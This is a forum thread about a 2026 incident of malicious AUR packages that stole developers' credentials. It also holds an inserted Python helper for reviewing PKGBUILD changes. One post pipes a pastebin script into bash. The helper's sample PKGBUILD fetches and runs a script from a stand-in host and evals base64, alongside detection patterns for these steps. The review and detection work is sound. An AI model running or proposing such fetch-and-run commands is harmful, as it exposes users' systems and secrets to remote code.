Malicious AUR packages

WHAT??? And not do my at least twice daily yay? Heresy!

In all truth, I do updates every couple of days, but I only have a few items from the AUR that aren’t in the repository.

did some independent reading this aft:

"The payload targets SSH keys, GitHub tokens, npm credentials, Docker and Podman auth, HashiCorp Vault tokens, browser session data, Slack, Discord, Microsoft Teams, Telegram, VPN config files, and shell histories. It also enumerates Chromium-family browser profiles – reading SQLite cookie databases and LevelDB local storage and queries Slack, Teams, Discord, GitHub, and OpenAI/ChatGPT APIs directly with any stolen tokens or cookies.

This is a credential vacuum aimed squarely at developers. Your AWS keys in .env, your GitHub PAT in ~/.gitconfig, your SSH private key for that production server – all of it in scope."

Pay close attention to the second-to-last sentence here ^^.

Bad guys had a very specific user in mind. Who would want that?

My alias for updating is the following…
alias up='yay -Pw && yay -Syyu && flatpak update && flatpak uninstall --unused'

The -Pw shows me any Arch news I have not seen. Which came in handy just now…

─❯ up
2026-06-12 Active AUR malicious packages incident
We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.

We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed.
While this is happening, and while we work to create a more permanent solution, users may see issues with the following:
Creating new accounts on the AUR
Pushing package updates
Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time.
If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.

[sudo] password for wombat:

I haven’t kept track of all comments since there is a lot of them and I just saw the thread today, so no idea if anything has already been said or not.

But this is one of the reasons I prefer to update once a week, or in some cases it could be every 2 weeks. It’s because a lot of these issues are caught within that time unless I am unlucky and malware was added right when I update. I believe these were pretty much orphaned packages affected, but technically this could happen to any AUR build script.

Of course I do read the PKGBUILDs and look out for dependencies being installed (especially new ones), external links in the script, dangerous commands, plus all the other things you need to do. But I do think a better system needs to be in place for the AUR as this was bound to happen with Linux and Arch becoming more popular.

But I think one of the issues is there are lots of core AUR packages that should really be on the official repositories. I have read that apparently popular packages get moved to official but I have never seen it happen for any I use, Librewolf-bin for example has a huge amount of votes and popularity and should be on the official repositories really. If more packages were on the official repository it would reduce how many people would need to use the AUR overall. Also maybe setting orphaned packages to read-only and a new maintainer verified.

Posting = Informing =/ Endorsing

So don’t draw your gun unless you have other compelling reasons :rofl:

Arch has been under sustained attack for over a year now!

Who exactly is this directed at?

Depends. The poster. The developer. The LLM.
Those holding the guns have always some compelling reason…

So should we hold off on any AUR package updates until the dust settles? Or is it “safe” now?
I ran the script posted above and it came up clean. But during a yay update, I noticed that proton-mail showed npm transactions during the build. I don’t see anything unusual in the pkgbuild…what are we supposed to look for?

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

Just out of curiosity, proton mail seems to be an electron app. That is, you practically install a (mini) browser packaged with your application.

I use a separate profile in Librewolf, that I have anyways installed, to use Proton’s web interface to log in to my account.

One less dependency on AUR, one less headache. WinWin!

I’ll avoid updating AUR packages at all until it’s clear that the bad actor isn’t actively compromising packages anymore. The creation of new Arch user accounts is paused due to this campaign, and pushing new package updates within the AUR is much more restrictive than usual, if I understood it right. It’s just a matter of time until the end of this campaign. Unless the attackers manage to impersonate additional user accounts.

I’ve just checked my machine again against an updated list of packages affected, with no hits. The current list could be used with the various checking scripts which are passed around at the moment, unless the packages are hard coded within the script itself.

So far, the whole attack vector has been to take over orphaned packages within the AUR using three different Arch user accounts, of which only one has been impersonated via git commit forgery. So in essence, if you’ve regularly removed any orphans during your update routine, which I do regularly, the risk is already mitigated by proper maintenance, at least to a certain degree.

Let’s look at the flipside: many eyes are proactively checking the AUR at the moment to identify malware injection. And eventually this will result not only in the removal of the current malware injection, but also in the removal of packages that have been orphaned and saw little to no use at all, and eventually they will also discover other bad actors in the process.

Nevermind. I see it was already posted.

I’m glad I managed to get rid of all AUR packages. I switched over to a very few (6) flatpaks instead or tried to work around it. I even managed by today to replace the few GNOME extensions with my own written stuff or “extra” packages. No npm anyway…

Of course this is no guarantee or 100% security, but it feels a bit more safe.

As I like to try out new stuff, I now only do this in a VM before I decide: do I really need this on my “prod machine”?

Hackers and evil guys obviously start to like Linux… damn…

Security is always about reducing the attack surface/vectors. Never about 100%.

The whole schtick of “bro arch sucks because of this” has been long played out and I’m starting to get tired of it.

Yes, the AUR is used at one’s own risk, but the Arch team could’ve done MUCH better here. For example, maybe fresh accounts shouldn’t be able to simply adopt thousands of packages?

Manually vetting each update to any PKGBUILD is an unreasonable ask; if one were to push for that, they’d have to make that apply only to new accounts or something.
Of course, this doesn’t solve the problem of an old account being compromised, but a lot of online services already deny access if the location is strange for the account (updates to packages could be blocked until you allow the location via email). AI could possibly be used, but I wouldn’t want to train a blackbox on open-source code (that could then go into one’s proprietary program, not to mention the costs).

Point is: The Arch team could’ve done better, but the whole point of the AUR is that it’s the Arch User Repository, not extra. Trying to place moderation on it has a high chance of being either draconian or completely ineffective, which is probably why things are the way they are now. I’d still install some sort of protection, like not allowing new accounts (or strange logins from old ones) to simply take action on thousands of packages.

I assume the main idea is that most packages a user might want are under extra? Or very well maintained AUR packages eventually get into extra? Either way, it’s one of the strong points of Arch, but also one of its weakest points, IMHO.

I personally go by the recommendation of the developer that maintains and develops the software I want to use: if they say on Arch systems, one should use the AUR package, I will use the AUR package and inspect the PKGBUILD file. Otherwise, I use the package in the repository (if it exists), Flatpaks, AppImages or even Snaps if it comes down to it (yes, they kind of suck, but I would rather have my preferred software than not sometimes).

So, AUR and other git repositories have been compromised: surprise surprise. It’s all happened many times before and it will never stop (read GEB, written in the early 70’s – before the internet and/or viruses – published in about 1977). Humans love to destroy other humans, and their properties, their work, their lives, whether it’s AUR repos or towns and villages in the middle east.

All users, myself and users like me included, should read, mark, learn and inwardly digest these many times linked-to Arch wiki pages:

  1. AUR
  2. PKGBUILD

It’s not over.

here we go again, now with obfuscated code:

$ git log --all -S "'b''u''n'" --since="3 hours ago" --oneline
af09b1cf1b59 (python-django-js-asset) Update dependencies (python-django-js-asset)
fc1686472116 (puppy-browser) Add missing deps (puppy-browser)
a5770512c0a0 (privacy-redirect-git) add deps
ad43b9d36fb0 (playhouse-git) rebuild
dee42adb1d4a (plasma6-applets-fancytasks) updpkgsums (plasma6-applets-fancytasks)
18e160e4af66 (openlayers) upgpkg
77e940aca52d (npm-accel) add deps (npm-accel)
9f78f86d315b (nodejs-vim-debugger) updpkgsums
a939ae0b94fa (nodejs-ws) Fix deps
2f45cba74d0e (nodejs-qunit) upgpkg (nodejs-qunit)
ae9efc2316e2 (nodejs-sweet) Fix build
2b0281471e67 (nodejs-pkg) Fix source
d8ec8d1b1667 (nodejs-nodemailer) Fix build (nodejs-nodemailer)
97423ad53ffc (nodejs-jsfmt) sync
8ecc4763ae6e (nodejs-json-to-js) Fix build (nodejs-json-to-js)
8c8777cb6efd (nodejs-jscs) add deps
def9a9c26f6d (nodejs-dicy-cli) Update source
520509753f52 (nodejs-browser-sync) Fix deps (nodejs-browser-sync)
50e70f41e533 (nitrogen-git) Fix install (nitrogen-git)
51f1f31c00fc (nem-wallet) Bump pkgrel
b0620ca63777 (neovim-telescope-file-browser-git) add deps
fd7c2046c370 (nanocurrency) Update PKGBUILD
8b08ce7e00be (librewolf-extension-vimiumc-bin) Fix install
dd99ef59434f (librewolf-extension-protonpass-bin) updpkgsums
5b92cb26426c (kmorph) Update dependencies (kmorph)
5efa44bdde97 (kibana6) Fix build
02262d4c0ca9 (just-js) updpkgsums
ff8e6c657a41 (kcmlaptop) Update source (kcmlaptop)
71061a13a17d (iceweasel) Fix build
7c3118898b73 (hudkit-wayland) Fix build (hudkit-wayland)
191ddf65e033 (hack-browser-data-git) Add missing deps
015d37ebcdf4 (gjs-git) sync
81136bdeb450 (fontfinder) sync
cce5fff63f88 (firefox-floccus) sync (firefox-floccus)
fe04bb990a35 (firefox-esr-noscript) rebuild
370d6ff5f5df (felida-bin) Fix deps
5ae118ed955e (edfbrowser-git) add deps
ac14770e3b30 (deno-git) Bump pkgrel
f9b91f5436dc (ctjs-bin) sync
3cbb060789e8 (concordium-desktop-wallet-testnet-bin) Fix build
3d477e3acbdc (cl-javascript) upgpkg
e08dd6e54f27 (cl-parse-js) Fix source
a82d32cd30a0 (claymore-miner-bin) rebuild
5f88b6813f74 (cl-parenscript) Fix install (cl-parenscript)
9441cefa807b (chia-git) Fix install
17870c40e170 (certbox-bin) Fix source
656ebbc409a9 (catalyst5-browser) Update source
525431fabeea (btdex-git) updpkgsums (btdex-git)
1e52b3bc3e06 Fix build
065f7bbc0b4c (algorand-devtools-bin) Fix source
bb5741e96690 (beaker-browser-git) Update PKGBUILD (beaker-browser-git)
b3cc85a2a3e3 (aura-browser) Update dependencies
ebf8ba97fc88 (amfora-favicons-git) updpkg (amfora-favicons-git)
855e58cf9dff (atto-bin) upgpkg
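A small review helper that automates the checklist mentioned earlier in the thread (new dependencies, links that are not in source=(), dangerous commands) and the single-quoted-character obfuscation that the git log search above looks for. This is an added example, not code from the thread or from Arch; the two PKGBUILDs, the hostname and the flagged patterns are constructed assumptions about what a reviewer would want to see before building an update.

```python
import re
# Constructed sample PKGBUILDs (not real AUR packages): a hypothetical
# package before and after a "Fix build" style update.
OLD_PKGBUILD = """\
pkgname=example-tool
depends=('nodejs')
source=("https://registry.npmjs.org/$pkgname/-/$pkgname-1.2.0.tgz")
package() { npm install -g --prefix "$pkgdir/usr" "$srcdir/$pkgname-1.2.0.tgz"; }
"""
NEW_PKGBUILD = """\
pkgname=example-tool
depends=('nodejs' 'bun')
source=("https://registry.npmjs.org/$pkgname/-/$pkgname-1.2.0.tgz")
prepare() {
  curl -s http://updates.example.invalid/setup.sh | bash
  eval "$(echo 'ZWNobyBoaQ==' | base64 -d)"
  "$srcdir"/'b''u''n' run postinstall
}
package() { npm install -g --prefix "$pkgdir/usr" "$srcdir/$pkgname-1.2.0.tgz"; }
"""
# Patterns a reviewer would not expect in a routine dependency or build fix (assumed list).
SUSPICIOUS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", "remote content piped to a shell"),
    (r"\beval\b", "eval of dynamically built text"),
    (r"base64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"(?:'[^']'){2,}", "string built from single-quoted characters (obfuscation)"),
]
def bash_array(text, name):
    # Items of a simple array assignment such as depends=('a' 'b')
    m = re.search(rf"^{name}=\((.*?)\)", text, re.M | re.S)
    return set(re.findall(r"[^\s'\"()]+", m.group(1))) if m else set()
def hosts(text):
    return set(re.findall(r"https?://([^/\s'\"()]+)", text))
def review_pkgbuild(old, new):
    # Findings about what an update changed; an empty list means nothing stood out
    findings = []
    for arr in ("depends", "makedepends", "optdepends", "source"):
        for item in sorted(bash_array(new, arr) - bash_array(old, arr)):
            findings.append(f"new {arr} entry: {item}")
    # Any host contacted that is not declared in source=() bypasses the checksums
    for host in sorted(hosts(new) - hosts(" ".join(bash_array(new, "source")))):
        findings.append(f"URL outside source=(): {host}")
    old_lines = set(old.splitlines())
    for line in new.splitlines():
        if line not in old_lines:  # only inspect lines this update added or changed
            for pattern, why in SUSPICIOUS:
                if re.search(pattern, line):
                    findings.append(f"{why}: {line.strip()}")
    return findings
```

In practice the two inputs would be the PKGBUILD from the last build you trusted (e.g. the cached copy yay keeps) and the freshly fetched one.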

In my case, if a package gets orphaned, I check to see if I need it and uninstall it if I can. For other AUR packages, I typically check out the source page first. Guess I should also start consistently reviewing package build scripts now as well.